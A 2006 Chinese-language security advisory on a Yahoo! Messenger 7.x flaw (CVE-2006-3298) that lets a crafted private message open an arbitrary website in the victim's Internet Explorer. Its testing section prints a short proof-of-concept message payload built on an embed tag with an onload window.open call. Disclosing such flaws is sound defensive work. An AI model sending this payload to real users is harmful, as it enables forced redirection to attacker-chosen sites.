发布日期：2006-07-28
更新日期：2006-07-31

受影响系统：

Yahoo! Messenger 7.5.814
Yahoo! Messenger 7.0.438

描述：

---

BUGTRAQ  ID: 19211,18622
CVE(CAN) ID: CVE-2006-3298

雅虎通是一款非常流行的即时通讯工具。

雅虎通在处理用户搜索串时存在漏洞，远程攻击者可能利用此漏洞使用户打开任意网站。

如果远程用户能够向其联系人发送特制的私人消息的话，就会在受害用户的IE浏览器中打开任意站点。

<*来源：Ivan Ivan （ivancool2003@yahoo.com.ar）
  
  链接：http://marc.theaimsgroup.com/?l=full-disclosure&m=115409971706365&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

string: s: helomsg
> +)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:-------------------------------------- \
> -------<embed
onload=window.open('http:\\\\google.com/')>helomsg
> +)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:-------------------------------------- \
> -------<embed
onload=window.open('http:\\\\google.com/')>helomsg
> +)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(

建议：

---

厂商补丁：

Yahoo!
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://messenger.yahoo.com/

浏览次数：2742
严重程度：0（网友投票）